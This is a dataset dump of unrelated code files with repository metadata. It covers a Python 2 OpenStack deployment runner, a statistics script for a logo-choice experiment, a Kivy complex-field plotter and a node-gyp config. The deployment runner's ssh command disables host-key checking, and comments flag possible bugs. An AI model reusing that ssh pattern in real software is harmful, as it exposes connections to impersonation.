return self.conncache['nova']
def get_cinder_client(self):
import cinderclient.client as cinderclient
if 'cinder' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['cinder'] = cinderclient.Client('1', **kwargs)
return self.conncache['cinder']
def get_neutron_client(self):
import neutronclient.neutron.client as neutronclient
if 'neutron' not in self.conncache:
kwargs = {'session': self.get_keystone_session()}
if 'OS_REGION_NAME' in os.environ:
kwargs['region_name'] = os.environ['OS_REGION_NAME']
self.conncache['neutron'] = neutronclient.Client('2.0', **kwargs)
return self.conncache['neutron']
def _map_network(self, network):
if network in self.mappings.get('networks', {}):
return self.mappings['networks'][network]
elif network in self.networks:
return self.networks[network]
return network
def detect_existing_resources(self):
neutron = self.get_neutron_client()
suffix = self.add_suffix('')
if suffix:
strip_suffix = lambda s:s[:-len(suffix)]
else:
strip_suffix = lambda s:s
network_name_by_id = {}
for network in neutron.list_networks()['networks']:
if network['name'].endswith(suffix):
base_name = strip_suffix(network['name'])
if base_name in self.networks:
raise exceptions.DuplicateResourceException('Network', network['name'])
self.networks[base_name] = network['id']
network_name_by_id[network['id']] = base_name
raw_ports = [{'id': port['id'],
'fixed_ip': port['fixed_ips'][0]['ip_address'],
'mac': port['mac_address'],
'network_name': network_name_by_id.get(port['network_id'], port['network_id'])}
for port in neutron.list_ports()['ports']]
ports_by_id = {port['id']: port for port in raw_ports}
ports_by_mac = {port['mac']: port for port in raw_ports}
for fip in neutron.list_floatingips()['floatingips']:
port_id = fip['port_id']
if not port_id:
continue
port = ports_by_id[port_id]
port['floating_ip'] = fip['floating_ip_address']
for secgroup in neutron.list_security_groups()['security_groups']:
if secgroup['name'].endswith(suffix):
base_name = strip_suffix(secgroup['name'])
if base_name in self.secgroups:
raise exceptions.DuplicateResourceException('Security Group', secgroup['name'])
self.secgroups[base_name] = secgroup['id']
nova = self.get_nova_client()
for node in nova.servers.list():
if node.name.endswith(suffix):
base_name = strip_suffix(node.name)
if base_name in self.nodes:
raise exceptions.DuplicateResourceException('Node', node.name)
self.nodes[base_name] = Node(node.name, {}, self)
for address in node.addresses.values():
mac = address[0]['OS-EXT-IPS-MAC:mac_addr']
port = ports_by_mac[mac]
self.nodes[base_name].ports.append(port)
def delete_volume(self, uuid):
cc = self.get_cinder_client()
cc.volumes.delete(uuid)
def delete_port(self, uuid):
nc = self.get_neutron_client()
nc.delete_port(uuid)
def delete_network(self, uuid):
nc = self.get_neutron_client()
nc.delete_network(uuid)
def delete_router(self, uuid):
nc = self.get_neutron_client()
nc.delete_router(uuid)
def delete_subnet(self, uuid):
nc = self.get_neutron_client()
try:
nc.delete_subnet(uuid)
except NeutronConflict, e:
# This is probably due to the router port. Let's find it.
router_found = False
for port in nc.list_ports(device_owner='network:router_interface')['ports']:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == uuid:
router_found = True
nc.remove_interface_router(port['device_id'],
{'subnet_id': uuid})
break
if router_found:
# Let's try again
nc.delete_subnet(uuid)
else:
# Ok, we didn't find a router, so clearly this is a different
# problem. Just re-raise the original exception.
raise
def delete_secgroup(self, uuid):
nc = self.get_neutron_client()
nc.delete_security_group(uuid)
def delete_secgroup_rule(self, uuid):
nc = self.get_neutron_client()
nc.delete_security_group_rule(uuid)
def delete_floatingip(self, uuid):
nc = self.get_neutron_client()
nc.delete_floatingip(uuid)
def delete_keypair(self, name):
nc = self.get_nova_client()
nc.keypairs.delete(name)
def delete_server(self, uuid):
nc = self.get_nova_client()
nc.servers.delete(uuid)
def create_volume(self, size, image_ref):
cc = self.get_cinder_client()
attempts_left = self.retry_count + 1
while attempts_left > 0:
try:
volume = cc.volumes.create(size=size,
imageRef=image_ref)
self.record_resource('volume', volume.id)
return volume
except Exception, e:
if attempts_left == 0:
raise
print e
attempts_left -= 1
def create_port(self, name, network, secgroups):
nc = self.get_neutron_client()
network_id = self._map_network(network)
port = {'name': name,
'admin_state_up': True,
'network_id': network_id,
'security_groups': secgroups}
port = nc.create_port({'port': port})['port']
return {'id': port['id'],
'fixed_ip': port['fixed_ips'][0]['ip_address'],
'mac': port['mac_address'],
'network_name': network}
def create_keypair(self, name, keydata):
nc = self.get_nova_client()
attempts_left = self.retry_count + 1
while attempts_left > 0:
try:
nc.keypairs.create(name, keydata)
break
except NovaConflict:
return
except Exception, e:
if attempts_left == 0:
raise
print e
attempts_left -= 1
def find_floating_network(self, ):
nc = self.get_neutron_client()
networks = nc.list_networks(**{'router:external': True})
return networks['networks'][0]['id']
def create_floating_ip(self):
nc = self.get_neutron_client()
floating_network = self.find_floating_network()
floatingip = {'floating_network_id': floating_network}
floatingip = nc.create_floatingip({'floatingip': floatingip})
self.record_resource('floatingip', floatingip['floatingip']['id'])
return (floatingip['floatingip']['id'],
floatingip['floatingip']['floating_ip_address'])
def associate_floating_ip(self, port_id, fip_id):
nc = self.get_neutron_client()
nc.update_floatingip(fip_id, {'floatingip': {'port_id': port_id}})
def create_network(self, name, info):
nc = self.get_neutron_client()
network = {'name': name, 'admin_state_up': True}
network = nc.create_network({'network': network})
self.record_resource('network', network['network']['id'])
subnet = {"network_id": network['network']['id'],
"ip_version": 4,
"cidr": info['cidr'],
"name": name}
subnet = nc.create_subnet({'subnet': subnet})['subnet']
self.record_resource('subnet', subnet['id'])
if '*' in self.mappings.get('routers', {}):
nc.add_interface_router(self.mappings['routers']['*'], {'subnet_id': subnet['id']})
return network['network']['id']
def create_security_group(self, base_name, info):
nc = self.get_neutron_client()
name = self.add_suffix(base_name)
secgroup = {'name': name}
secgroup = nc.create_security_group({'security_group': secgroup})['security_group']
self.record_resource('secgroup', secgroup['id'])
self.secgroups[base_name] = secgroup['id']
for rule in (info or []):
secgroup_rule = {"direction": "ingress",
"ethertype": "IPv4",
"port_range_min": rule['from_port'],
"port_range_max": rule['to_port'],
"protocol": rule['protocol'],
"security_group_id": secgroup['id']}
if 'source_group' in rule:
secgroup_rule['remote_group_id'] = self.secgroups.get(rule['source_group'], rule['source_group'])
else:
secgroup_rule['remote_ip_prefix'] = rule['cidr']
secgroup_rule = nc.create_security_group_rule({'security_group_rule': secgroup_rule})
self.record_resource('secgroup_rule', secgroup_rule['security_group_rule']['id'])
def build_env_prefix(self, details):
env_prefix = ''
def add_environment(key, value):
return '%s=%s ' % (pipes.quote(key), pipes.quote(value or ''))
env_prefix += add_environment('ALL_NODES',
' '.join([self.add_suffix(s) for s in self.nodes.keys()]))
for node_name, node in self.nodes.iteritems():
if node.info.get('export', False):
for port in node.ports:
key = 'AASEMBLE_%s_%s_fixed' % (node_name, port['network_name'])
value = port['fixed_ip']
env_prefix += add_environment(key, value)
if 'environment' in details:
for key, value in details['environment'].items():
if value.startswith('$'):
value = os.environ.get(value[1:])
env_prefix += add_environment(key, value)
return env_prefix
def shell_step(self, details, environment=None):
    """Run one shell command step, honouring retry/timeout settings.

    Recognised keys in details:
      retry-if-fails: retry on failure (and on per-attempt timeout)
      retry-delay:    pause between retries
      timeout:        wall-clock limit per attempt
      total-timeout:  overall limit across all attempts
    """
    env_prefix = self.build_env_prefix(details)
    cmd = self.shell_step_cmd(details, env_prefix)
    if details.get('total-timeout', False):
        overall_deadline = time.time() + utils.parse_time(details['total-timeout'])
    else:
        overall_deadline = None
    if details.get('timeout', False):
        individual_exec_limit = utils.parse_time(details['timeout'])
    else:
        individual_exec_limit = None
    if details.get('retry-delay', False):
        retry_delay = utils.parse_time(details['retry-delay'])
    else:
        retry_delay = 0
    def wait():
        time.sleep(retry_delay)
    # Four settings matter here:
    # retry-if-fails: True/False
    # retry-delay: Time to wait between retries
    # timeout: Max time per command execution
    # total-timeout: How long time to spend on this in total
    while True:
        if individual_exec_limit:
            # Per-attempt deadline, clamped to the overall deadline.
            deadline = time.time() + individual_exec_limit
            if overall_deadline:
                if deadline > overall_deadline:
                    deadline = overall_deadline
        elif overall_deadline:
            deadline = overall_deadline
        else:
            deadline = None
        try:
            run_cmd_once(cmd, details['cmd'], environment, deadline)
            break
        except exceptions.CommandFailedException:
            if details.get('retry-if-fails', False):
                wait()
                continue
            raise
        except exceptions.CommandTimedOutException:
            # Only retry a timed-out attempt if there is still room for
            # another attempt before the deadline.
            if details.get('retry-if-fails', False):
                if time.time() + retry_delay < deadline:
                    wait()
                    continue
            raise
def shell_step_cmd(self, details, env_prefix=''):
    """Return the command line used to execute a shell step.

    Remote steps are wrapped in an ssh invocation targeting the node's
    floating IP; local steps simply run bash with the environment prefix.
    """
    if details.get('type', None) != 'remote':
        return '%s bash' % (env_prefix,)
    address = self.nodes[details['node']].floating_ip
    return 'ssh -o StrictHostKeyChecking=no ubuntu@%s "%s bash"' % (address, env_prefix)
def add_suffix(self, s):
    """Append the runner's resource-name suffix to s, if one is set."""
    return '%s_%s' % (s, self.suffix) if self.suffix else s
def provision_step(self, details):
    """Provision networks, security groups and nodes from a stack file.

    details['stack'] names a YAML file describing 'networks',
    'securitygroups' and 'nodes'.  Nodes are built asynchronously and
    polled until they all reach ACTIVE (failed builds may be retried by
    _poll_pending_nodes).
    """
    stack = load_yaml(details['stack'])
    if self.key:
        keypair_name = self.add_suffix('pubkey')
        self.create_keypair(keypair_name, self.key)
        self.record_resource('keypair', keypair_name)
    else:
        keypair_name = None
    if 'userdata' in details:
        with open(details['userdata'], 'r') as fp:
            userdata = fp.read()
    else:
        userdata = None
    pending_nodes = set()
    def wait():
        time.sleep(5)
    for base_network_name, network_info in stack['networks'].items():
        if base_network_name in self.networks:
            continue  # already provisioned (e.g. an --incremental run)
        network_name = self.add_suffix(base_network_name)
        self.networks[base_network_name] = self.create_network(network_name,
                                                               network_info)
    for base_secgroup_name, secgroup_info in stack['securitygroups'].items():
        if base_secgroup_name in self.secgroups:
            continue
        self.create_security_group(base_secgroup_name, secgroup_info)
    for base_node_name, node_info in stack['nodes'].items():
        if 'number' in node_info:
            # 'number: N' expands into node1..nodeN sharing the same info.
            count = node_info.pop('number')
            for idx in range(1, count+1):
                node_name = '%s%d' % (base_node_name, idx)
                name = self._create_node(node_name, node_info,
                                         keypair_name=keypair_name, userdata=userdata)
                if name:
                    pending_nodes.add(name)
        else:
            name = self._create_node(base_node_name, node_info,
                                     keypair_name=keypair_name, userdata=userdata)
            if name:
                pending_nodes.add(name)
    while True:
        pending_nodes = self._poll_pending_nodes(pending_nodes)
        if not pending_nodes:
            break
        wait()
def _create_node(self, base_name, node_info, keypair_name, userdata):
    """Create a Node, start building it, and return its base name.

    Returns None if a node with that base name already exists, so callers
    know not to add it to the pending set again.
    """
    if base_name in self.nodes:
        return
    node_name = self.add_suffix(base_name)
    self.nodes[base_name] = Node(node_name, node_info,
                                 runner=self,
                                 keypair=keypair_name,
                                 userdata=userdata)
    self.nodes[base_name].build()
    return base_name
def _poll_pending_nodes(self, pending_nodes):
    """Poll each pending node once; return the still-pending subset.

    ACTIVE nodes are dropped from the set.  ERROR nodes are cleaned up
    and rebuilt while they have retry attempts left (when retry_count is
    set); otherwise provisioning fails outright.
    """
    done = set()
    for name in pending_nodes:
        state = self.nodes[name].poll()
        if state == 'ACTIVE':
            done.add(name)
        elif state == 'ERROR':
            if self.retry_count:
                self.nodes[name].clean()
                if self.nodes[name].attempts_left:
                    self.nodes[name].build()
                    continue
            raise exceptions.ProvisionFailedException()
    return pending_nodes.difference(done)
def deploy(self, name):
    """Run every step of the named deployment from the config file.

    Each step is a one-key mapping {step_type: details}; the step type is
    dispatched to the matching <step_type>_step method.  (Python 2 code:
    relies on dict.keys() returning an indexable list.)
    """
    for step in self.cfg[name]:
        step_type = step.keys()[0]
        details = step[step_type]
        func = getattr(self, '%s_step' % step_type)
        func(details)
def main(argv=sys.argv[1:], stdout=sys.stdout):
    """Command-line entry point: list-refs, deploy and cleanup subcommands."""
    def deploy(args):
        # Build a DeploymentRunner from the CLI arguments and run the
        # named deployment, optionally recording resources for cleanup.
        cfg = load_yaml(args.cfg)
        if args.key:
            with open(args.key, 'r') as fp:
                key = fp.read()
        # NOTE(review): 'key' is unbound here if --key was not given —
        # TODO confirm whether --key is effectively mandatory.
        dr = DeploymentRunner(config=cfg,
                              suffix=args.suffix,
                              mappings=load_mappings(args.mappings),
                              key=key,
                              retry_count=args.retry_count)
        if args.cont:
            dr.detect_existing_resources()
        if args.cleanup:
            # Record every created resource to the cleanup log so the
            # 'cleanup' subcommand can delete them later.
            with open(args.cleanup, 'a+') as cleanup:
                def record_resource(type_, id):
                    cleanup.write('%s: %s\n' % (type_, id))
                dr.record_resource = record_resource
                dr.deploy(args.name)
        else:
            dr.deploy(args.name)
    def cleanup(args):
        # Replay a cleanup log in reverse order, deleting each resource
        # via the matching delete_<type> method; errors are printed and
        # skipped so one failure does not abort the rest of the cleanup.
        dr = DeploymentRunner()
        with open(args.log, 'r') as fp:
            lines = [l.strip() for l in fp]
        lines.reverse()
        for l in lines:
            resource_type, uuid = l.split(': ')
            func = getattr(dr, 'delete_%s' % resource_type)
            try:
                func(uuid)
            except Exception, e:  # Python 2 syntax; best-effort cleanup
                print e
    parser = argparse.ArgumentParser(description='Run deployment')
    subparsers = parser.add_subparsers(help='Subcommand help')
    list_refs_parser = subparsers.add_parser('list-refs',
                                             help='List symbolic resources')
    list_refs_parser.set_defaults(func=list_refs)
    list_refs_parser.add_argument('--tmpl', action='store_true',
                                  help='Output template ini file')
    list_refs_parser.add_argument('stack', help='YAML file describing stack')
    deploy_parser = subparsers.add_parser('deploy', help='Perform deployment')
    deploy_parser.set_defaults(func=deploy)
    deploy_parser.add_argument('--cfg', default='.aasemble.yaml',
                               help='Deployment config file')
    deploy_parser.add_argument('--suffix', help='Resource name suffix')
    deploy_parser.add_argument('--mappings', help='Resource map file')
    deploy_parser.add_argument('--key', help='Public key file')
    deploy_parser.add_argument('--cleanup', help='Cleanup file')
    deploy_parser.add_argument('--retry-count', type=int, default=0,
                               help='Retry RETRY-COUNT times before giving up provisioning a VM')
    deploy_parser.add_argument('--incremental', dest='cont', action='store_true',
                               help="Don't create resources if identically named ones already exist")
    deploy_parser.add_argument('name', help='Deployment to perform')
    cleanup_parser = subparsers.add_parser('cleanup', help='Clean up')
    cleanup_parser.set_defaults(func=cleanup)
    cleanup_parser.add_argument('log', help='Clean up log (generated by deploy)')
    args = parser.parse_args(argv)
    if args.func:
        args.func(args)
if __name__ == '__main__':
main()
| [
"Soren.Hansen@ril.com"
] | Soren.Hansen@ril.com |
7d21469797bd6dd19ae18a5104d38e6915cec052 | d1acce814517a237d9770be067269804b52ebecf | /tests.py | 67e605b2a12bb27e831bfaa08fb6698402d81d62 | [] | no_license | gpfernandezflorio/incc | 4f1d42c29eacaa8cd5521ed9f498d7638b005106 | 63d304145c65ba6f1910ce2453e65d1548026d33 | refs/heads/master | 2020-11-25T00:28:25.008786 | 2016-10-31T10:59:43 | 2016-10-31T10:59:43 | 66,871,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,158 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 analysis script (print statements, list-returning map).
#
# Ir: relation index of a trial = 1/time.
# Ir_uxc: relation index of user u w.r.t. one of the four classes c =
#         sum of Ir over that user's trials in which class c was chosen.
# Ir_cxt: relation index of choice c w.r.t. target t = sum of Ir over the
#         trials with target t in which choice c was picked.
# Ir_l1xl2: relation index of logo l1 w.r.t. logo l2 = sum of Ir over the
#         trials with target l1 in which l2 was picked.
# Irr_uxc: relative relation index of user u w.r.t. class c =
#         Ir_uxc / number of trials in which the user chose class c.
# Irr_cxt: relative relation index of choice c w.r.t. target t =
#         Ir_cxt / number of times choice c appeared.
# TODO: sort `randoms` by balloon size.
# TODO: make the pTarget plot two-dimensional: put the 4 classes on the
#       y axis and the NORMALIZED index on the z axis (color/size).
# TODO: define the normalized index.
import sys, math, random, datetime, Image
import numpy as np
import matplotlib.pyplot as plt
from matplotlib._png import read_png
from scipy import stats
from statsmodels.stats.multicomp import pairwise_tukeyhsd
from statsmodels.stats.multicomp import MultiComparison
if __name__ == '__main__':
    f = open("trials.txt", 'r')
    # Class labels keyed by the digit stored in the trial records.
    obj = {'0':"CONCEPTO",'1':"LETRA/FORMA",'2':"COLOR",'3':"RUIDO",'4':"?"}
    trials_c = {}
    users = []
    temp_users = []
    user = -1
    alls = {obj['0']:0,obj['1']:0,obj['2']:0,obj['3']:0,"TOTAL":0}
    randoms = {}
    rand_int = 0
    # TODO: add to the last plot the mean (and variance) of the users' choices.
    avg_users = [[],[],[],[]]
    avg_users_quantity = [[],[],[],[]]
    avg_users_time = [[],[],[],[]]
    for l in f:
        if l.startswith("NEW USER"):
            # User change: start fresh accumulators for the next participant.
            user = user+1
            users.append({obj['0']:0,obj['1']:0,obj['2']:0,obj['3']:0,"TOTAL":0})
            temp_users.append([])
            avg_users[0].append(0)
            avg_users[1].append(0)
            avg_users[2].append(0)
            avg_users[3].append(0)
            avg_users_quantity[0].append(0)
            avg_users_quantity[1].append(0)
            avg_users_quantity[2].append(0)
            avg_users_quantity[3].append(0)
            avg_users_time[0].append(0)
            avg_users_time[1].append(0)
            avg_users_time[2].append(0)
            avg_users_time[3].append(0)
        elif l[0] == '>':
            # Random trial
            trial = l[1:].split('|')
            time = float(trial[5])
            if not trial[0] in randoms:
                randoms[trial[0]] = [rand_int,{}]
                rand_int += 1
            if not trial[1] in randoms[trial[0]][1]:
                randoms[trial[0]][1][trial[1]] = [1,1/time]
            else:
                randoms[trial[0]][1][trial[1]][0] += 1
                randoms[trial[0]][1][trial[1]][1] += 1/time
            for i in range(2,5):
                if not trial[i] in randoms[trial[0]][1]:
                    randoms[trial[0]][1][trial[i]] = [1,0]
                else:
                    # NOTE(review): updates trial[1] inside a loop over
                    # trial[i] — looks like it should be trial[i]; confirm.
                    randoms[trial[0]][1][trial[1]][0] += 1
        elif l[0] != '<':
            # Set trial
            trial = l.split('|')
            time = float(trial[6])
            if not trial[0] in trials_c:
                trials_c[trial[0]] = {}
            # Chosen option:
            if not trial[1] in trials_c[trial[0]]:
                trials_c[trial[0]][trial[1]] = [1,1/time,trial[2]]
            else:
                # Add 1 to the appearance count
                trials_c[trial[0]][trial[1]][0] += 1
                # Accumulate the choice index (1/time)
                trials_c[trial[0]][trial[1]][1] += 1/time
                if trials_c[trial[0]][trial[1]][2] == '4':
                    trials_c[trial[0]][trial[1]][2] = trial[2]
            # The remaining (non-chosen) options
            for j in range(3,6):
                if not trial[j] in trials_c[trial[0]]:
                    # Add 1 to the appearance count
                    trials_c[trial[0]][trial[j]] = [1,0,'4']
                else:
                    # Add 1 to the appearance count
                    trials_c[trial[0]][trial[j]][0] += 1
            temp_users[user].append(trial[2])
            users[user][obj[trial[2]]] += 1/time
            users[user]["TOTAL"] += 1
            alls[obj[trial[2]]] += 1/time
            alls["TOTAL"] += 1
            avg_users[int(trial[2])][user] += 1/time
            avg_users_quantity[int(trial[2])][user] += 1
            avg_users_time[int(trial[2])][user] += time
    colors = ['r','g','b','gold','c','purple','darkorange','darkblue','olive','mediumpurple','lightcoral','yellowgreen','saddlebrown','dodgerblue','lightpink','darkgrey','k']
    # F, p = stats.f_oneway(avg_users_time[0],avg_users_time[1], avg_users_time[2], avg_users_time[3])
    # print "Relativo tiempo"
    # print p
    # F, p = stats.f_oneway(avg_users[0],avg_users[1], avg_users[2], avg_users[3])
    # print "Anova RI"
    # print p
    # One-way ANOVA over the per-user choice counts of the four classes.
    F, p = stats.f_oneway(avg_users_quantity[0],avg_users_quantity[1], avg_users_quantity[2], avg_users_quantity[3])
    print "Anova Cantidad de elecciones de un usuario por clase"
    print p
    print("-------------------------------------------------------------------------")
    print("*************************************************************************")
    print("-------------------------------------------------------------------------")
    # Tukey HSD post-hoc comparison between the four classes.
    arrayAux1 = np.concatenate((np.array(avg_users_quantity[0]), np.array(avg_users_quantity[1])), axis=0)
    arrayAux2 = np.concatenate((np.array(avg_users_quantity[2]), np.array(avg_users_quantity[3])), axis=0)
    arrayTotal = np.concatenate((arrayAux1, arrayAux2), axis=0)
    arr1 = np.array(map(lambda x: "concepto", range(len(avg_users_quantity[0]))))
    arr2 = np.array(map(lambda x: "letra/forma", range(len(avg_users_quantity[1]))))
    arr3 = np.array(map(lambda x: "color", range(len(avg_users_quantity[2]))))
    arr4 = np.array(map(lambda x: "ruido", range(len(avg_users_quantity[3]))))
    arrAux1 = np.concatenate((arr1, arr2), axis=0)
    arrAux2 = np.concatenate((arr3, arr4), axis=0)
    arrTotal = np.concatenate((arrAux1, arrAux2), axis=0)
    mc = MultiComparison(arrayTotal, arrTotal)
    result = mc.tukeyhsd()
    print(result)
    print(mc.groupsunique)
    print("-------------------------------------------------------------------------")
    print("*************************************************************************")
    print("-------------------------------------------------------------------------")
    # Same analysis, but with counts normalised by each user's total plays.
    avg_users_jugadas = map(lambda x: users[x]["TOTAL"], range(len(users)))
    avg_users_relativos0 = map(lambda x: avg_users[0][x]/avg_users_jugadas[x], range(len(users)))
    avg_users_relativos1 = map(lambda x: avg_users[1][x]/avg_users_jugadas[x], range(len(users)))
    avg_users_relativos2 = map(lambda x: avg_users[2][x]/avg_users_jugadas[x], range(len(users)))
    avg_users_relativos3 = map(lambda x: avg_users[3][x]/avg_users_jugadas[x], range(len(users)))
    arrayAux0 = np.concatenate((np.array(avg_users_relativos0), np.array(avg_users_relativos1)), axis=0)
    arrayAux1 = np.concatenate((np.array(avg_users_relativos2), np.array(avg_users_relativos3)), axis=0)
    arrayTotal = np.concatenate((arrayAux0, arrayAux1), axis=0)
    mc = MultiComparison(arrayTotal, arrTotal)
    result = mc.tukeyhsd()
    F, p = stats.f_oneway(avg_users_relativos0,avg_users_relativos1, avg_users_relativos2, avg_users_relativos3)
    print "Anova Cantidad de elecciones de un usuario por clase / cantidad de jugadas del usuario"
    print p
    print(result)
    print(mc.groupsunique)
    #chi2, p, dof, expected = stats.chi2_contingency(np.array([avg_users_relativos0, avg_users_relativos1, avg_users_relativos2, avg_users_relativos3]))
    #print p
    # Normalise the distribution by taking the logarithm of the time.
| [
"cyntiab83@gmail.com"
] | cyntiab83@gmail.com |
787702abe9f8792377f89128766d2139c6471d3b | 4440b2d241d939e4b0a8f6c6abcf4f526d8c056c | /firstpython.py | 8db0959598a6bbdcfad6700809b5ba11993efeae | [] | no_license | XmingoZ/allthatjazz | 2516d820957cfaf378622a96db36b56a7f5b0477 | f19b2a3bffac0f59ba561f2d612c070b4ac75c3f | refs/heads/main | 2023-04-22T09:18:46.498594 | 2021-05-06T13:29:42 | 2021-05-06T13:29:42 | 364,875,435 | 0 | 0 | null | 2021-05-06T13:29:43 | 2021-05-06T10:43:55 | Python | UTF-8 | Python | false | false | 44 | py | #display the output
print "new python file"
| [
"noreply@github.com"
] | noreply@github.com |
a95d050d78505518fd176341ec20f39c0b7204e2 | f1e86be4aa5b6889b02642d8b554f3ee770db203 | /Field.py | 7b21c6c733368230e62d849eb4f09b26ee0a2ee8 | [] | no_license | solavrov/cfield | 02ae193d7563024a9bca54397592628a77d44251 | f8eff587643bf9ae10a7efa6be1ea5527e139af2 | refs/heads/master | 2020-03-30T04:42:01.263695 | 2018-10-03T13:37:00 | 2018-10-03T13:37:00 | 150,757,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | from kivy.uix.widget import Widget
from kivy.graphics import Line, Ellipse, Color, Triangle, Rectangle
from kivy.vector import Vector
from OVector import OVector
from math import inf
from kivy.core.window import Window
import cdf
import rgb
class Field(Widget):
    """Kivy widget that renders a complex-valued 2-D vector field.

    The field function maps a complex z to a complex value; each sampled
    point becomes an arrow (OVector) coloured by relative magnitude.
    World coordinates are mapped to window pixels through the affine
    transform (shift, stretch) computed in calc().
    """
    def __init__(self, field_function, low_left: Vector, high_right: Vector, step, paint_accuracy=20,
                 back_color=Color(0, 0, 0, 1), **kwargs):
        # NOTE(review): the Color default argument is evaluated once at
        # class-definition time and shared across calls — confirm intended.
        super().__init__(**kwargs)
        self.field = []              # sampled OVector arrows
        self.shift = Vector(0, 0)    # pixel offset of the world origin
        self.stretch = Vector(0, 0)  # world -> pixel scale per axis
        self.draw_background(back_color)
        self.calc(field_function, low_left, high_right, step)
        self.paint(paint_accuracy)
        self.normalize(step * 0.8)
    def map_ov(self, ov: OVector):
        # World-space vector -> screen-space vector (position and direction).
        return OVector(self.shift + self.stretch * ov.p, self.stretch * ov.v, ov.color)
    def map_v(self, v: Vector):
        # World-space point -> screen-space point.
        return Vector(self.shift + self.stretch * v)
    def add_vector(self, ov: OVector):
        self.field.append(ov)
    def draw_field(self):
        """Draw every sampled vector as a small arrow head plus a base dot."""
        for ov in self.field:
            ov = self.map_ov(ov)
            # Unit vector perpendicular to the arrow, used to place the
            # two base corners of the triangle.
            e = ov.v.rotate(90).normalize()
            tri_points = tuple(ov.end()) + tuple(ov.p + 2 * e) + tuple(ov.p - 2 * e)
            tri = Triangle(points=tri_points)
            dot = Ellipse(pos=(ov.p - Vector(2, 2)), size=(5, 5))
            self.canvas.add(ov.color)
            self.canvas.add(tri)
            self.canvas.add(dot)
    def calc(self, field_function, low_left: Vector, high_right: Vector, step: float):
        """Sample field_function on a grid and set the world->pixel mapping."""
        y = low_left.y
        while y <= high_right.y:
            x = low_left.x
            while x <= high_right.x:
                z = complex(x, y)
                try:
                    v = Vector(field_function(z).real, field_function(z).imag)
                except ZeroDivisionError:
                    # Poles are marked with an infinite vector and painted
                    # specially in paint().
                    v = Vector(inf, inf)
                ov = OVector(Vector(x, y), v)
                self.add_vector(ov)
                # Rounding dodges float drift accumulating across steps.
                x = round(x + step, 14)
            y = round(y + step, 14)
        self.stretch = Vector(Window.size[0] / (high_right.x - low_left.x),
                              Window.size[1] / (high_right.y - low_left.y))
        self.shift = Vector(-self.stretch.x * low_left.x, -self.stretch.y * low_left.y)
    def paint(self, accuracy):
        """Colour every vector by its magnitude's empirical-CDF value.

        Finite magnitudes are normalised by the maximum, run through the
        cdf-module approximation and mapped to a colour; infinite
        magnitudes (poles) are painted red.
        """
        mods = []
        for ov in self.field:
            mod = ov.len()
            if mod != inf:
                mods.append(mod)
        # NOTE(review): max() raises ValueError if every sample is infinite.
        max_mod = max(mods)
        norm_mods = [e / max_mod for e in mods]
        cdf_nodes = cdf.get_cdf_nodes(norm_mods, accuracy)
        for ov in self.field:
            mod = ov.len()
            if mod != inf:
                try:
                    t = mod / max_mod
                except ZeroDivisionError:
                    t = 0
                u = cdf.interp(t, cdf_nodes)
                ov.color = rgb.rgb1(u)
            else:
                ov.color = Color(1, 0, 0, 1)
    def normalize(self, unit):
        """Rescale every arrow to the same display length `unit`."""
        for ov in self.field:
            ov.normalize(unit)
    def build(self, field_function, low_left: Vector, high_right: Vector, step, paint_accuracy=20):
        """Recompute the field (same pipeline as the tail of __init__)."""
        self.calc(field_function, low_left, high_right, step)
        self.paint(paint_accuracy)
        self.normalize(step * 0.8)
    def draw_background(self, color):
        # Fill the whole window with the background colour.
        self.canvas.add(color)
        self.canvas.add(Rectangle(pos=(0, 0), size=Window.size))
    def draw_path(self, low_left: Vector, high_right: Vector, color=Color(1, 1, 1, 1)):
        """Outline the rectangle with world-space corners low_left/high_right."""
        low_left = self.map_v(low_left)
        high_right = self.map_v(high_right)
        self.canvas.add(color)
        self.canvas.add(Line(points=(low_left, (low_left.x, high_right.y)), width=1))
        self.canvas.add(Line(points=((low_left.x, high_right.y), high_right), width=1))
        self.canvas.add(Line(points=(high_right, (high_right.x, low_left.y)), width=1))
        self.canvas.add(Line(points=((high_right.x, low_left.y), low_left), width=1))
    def draw_cross(self, center=Vector(0, 0), size=1, color=Color(0.20, 0.20, 0.20, 1)):
        """Draw an axis cross of half-length `size` centred on `center` (world coords).

        NOTE(review): the Vector/Color defaults are shared mutable objects.
        """
        x_left = self.map_v(Vector(center.x - size, center.y))
        x_right = self.map_v(Vector(center.x + size, center.y))
        y_low = self.map_v(Vector(center.x, center.y - size))
        y_high = self.map_v(Vector(center.x, center.y + size))
        self.canvas.add(color)
        self.canvas.add(Line(points=(x_left, x_right), width=5))
        self.canvas.add(Line(points=(y_low, y_high), width=5))
| [
"2slavrov@gmail.com"
] | 2slavrov@gmail.com |
92d788f518b31c7450b6c783c2fe0e6b817f1f9c | 8d44166d504bcfb5411f853cb43ee7ca152ba7e1 | /node_modules/mongoose/node_modules/mongodb/node_modules/kerberos/build/config.gypi | ae121d3299f74d154c797e24f253a3fd691dc205 | [
"Apache-2.0",
"MIT"
] | permissive | ChessEvents/player-update-schedule | 1030d1393be779c3c79600f762307da3f83c5ad1 | c7af402a8fa85d2e34f453fc56e9456252c5f840 | refs/heads/master | 2021-01-10T18:17:15.087439 | 2015-12-08T11:58:15 | 2015-12-08T11:58:15 | 47,544,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,837 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "x64",
